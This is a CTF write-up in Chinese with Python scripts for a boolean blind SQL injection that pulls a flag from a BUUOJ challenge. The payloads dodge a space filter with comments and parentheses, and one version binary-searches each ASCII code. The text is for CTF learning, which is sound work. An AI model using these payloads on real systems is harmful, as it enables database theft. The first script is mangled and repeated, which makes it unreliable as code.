import requests
url ="http://8eda0aa2-9a0e-4fd3-93c1-f3face942c15.node3.buuoj.cn/"
payload =r"_-abcdefghijkmlnopqrstuvwxzy{}123456789!@#$%^&(),"
flag =""defcolounm():for i inrange(1,50):for j in payload:#db_url = url + "?stunum=if((select(substr(group_concat(table_name),{},1))from/**/information_schema.tables/**/where/**/table_schema=database())='{}',1,2)".format(i,j)#db_url = url + "?stunum=if((select(substr(group_concat(column_name),{},1))from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='flag')='{}',1,2)".format(i,j)
db_url = url +"?stunum=if((select(substr(group_concat(value),{},1))from/**/flag)='{}',1,2)".format(i,j)
r = requests.get(db_url)if"Hi admin"in r.text:global flag
flag += j
print(flag)breakif __name__=="__main__":print('start')
colounm()
我自己写的脚本没有用二分法（每个位置按字符表逐个试）。
下面是 wp 中的二分法版本（对每个字符二分 ASCII 码，范围 32..128，每个字符约 7 次请求）：
import requests
import time
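flag = ""

# NOTE(review): offensive helper for a CTF instance. Only point it at targets
# you are authorised to test.
URL = "http://8eda0aa2-9a0e-4fd3-93c1-f3face942c15.node3.buuoj.cn/"
# Oracle: stunum=1^(cond). When cond is true, 1^1 = 0 is not a valid student
# number and the page says 'student number not exists'; when false, 1^0 = 1.
# group_concat(flag,0x2b,value) joins the `flag` and `value` columns with '+'
# (0x2b). Spaces are filtered, so the query avoids them with parentheses.
QUERY = "1^(ascii(substr((select(group_concat(flag,0x2b,value))from(flag)),%d,1))>%d)"
TRUE_MARKER = "student number not exists"


def _http_oracle(pos, mid, timeout=10):
    """Return True iff ascii(substr(<joined flag row>, pos, 1)) > mid on the target.

    The payload is passed via ``params=`` so it is percent-encoded on the
    wire (``^``, ``>`` etc.); a timeout keeps a hung connection from stalling
    the extraction.
    """
    res = requests.get(URL, params={"stunum": QUERY % (pos, mid)}, timeout=timeout)
    return TRUE_MARKER in res.text


def _search_ascii(oracle, pos, low=32, high=128, delay=0.1):
    """Binary-search the ASCII code of the character at 1-based *pos*.

    *oracle(pos, mid)* must answer "is the code strictly greater than mid".
    Past the end of the string MySQL's ascii('') is 0, every answer is False
    and the search collapses to *low*; a code above the range collapses to
    *high*. *delay* seconds are slept after each request (rate limiting).
    """
    mid = (low + high) // 2
    while low < high:
        if oracle(pos, mid):
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
        if delay:
            time.sleep(delay)
    return mid


def extract_flag(oracle=None, max_len=99, delay=0.1):
    """Recover the joined flag row character by character.

    Args:
        oracle: ``callable(pos, mid) -> bool``; defaults to the HTTP oracle.
        max_len: positions probed at most (the original loop ran over 1..99).
        delay: seconds slept between requests.

    Returns:
        The recovered string; also stored in the module-level ``flag``.

    Caveat: the lower bound 32 doubles as the end-of-string sentinel, so a
    literal space in the value also stops extraction (same as the original).
    """
    global flag
    probe = _http_oracle if oracle is None else oracle
    found = ""
    for pos in range(1, max_len + 1):
        code = _search_ascii(probe, pos, delay=delay)
        # 32: past the end of the string. >=127: DEL or a byte above the
        # search range (the original only checked == 127 and would append
        # chr(128) for anything larger).
        if code == 32 or code >= 127:
            break
        found += chr(code)
        print(found)
    flag = found
    return found


if __name__ == "__main__":
    extract_flag()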
SQL 注入的布尔盲注，过滤了空格（payload 中用 /**/ 或括号代替空格），直接交 exp：import requestsurl = "http://8eda0aa2-9a0e-4fd3-93c1-f3face942c15.node3.buuoj.cn/"payload =r"_-abcdefghijkmlnopqrstuvwxzy{}123456789!@#$%^&(),"flag = ""def colounm(): for i in range(1,50): for j in payload: .